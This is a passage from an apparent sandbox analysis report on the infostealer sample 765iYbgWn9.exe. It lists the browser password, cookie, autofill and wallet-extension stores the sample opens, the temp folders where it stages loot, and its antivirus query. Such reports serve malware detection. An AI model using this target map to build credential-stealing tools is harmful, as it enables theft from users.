          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\765iYbgWn9.exe VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.mp3 VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.mp3 VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.jpg VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.pdf VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.png VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\QCFWYSKMHA.jpg VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.png VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.png VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.mp3 VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\BNAGMGSPLO.jpg VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\BNAGMGSPLO.mp3 VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ.pdf VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ.xlsx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\IPKGELNTQY.xlsx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\SFPUSAFIOL.docx VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\SUAVTZKNFL.png VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\Documents\ZQIXMVQGAH.png VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\CreditCards VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\screen1.png VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\sensitive-files.zip VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\user_info.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Chrome_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Chrome_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Edge_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Edge_Default_Network.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Chrome_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Edge_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Firefox_qnq0haq7.default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Edge_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Firefox_qnq0haq7.default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads\Edge_Default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\CreditCards\Firefox_Firefox.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Chrome_Default_Network.txt VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara match, file source: 765iYbgWn9.exe, type: SAMPLE
          Source: Yara match, file source: sslproxydump.pcap, type: PCAP
          Source: Yara match, file source: 0.0.765iYbgWn9.exe.7ff62f040000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: Process Memory Space: 765iYbgWn9.exe PID: 7552, type: MEMORYSTR
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegll
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data
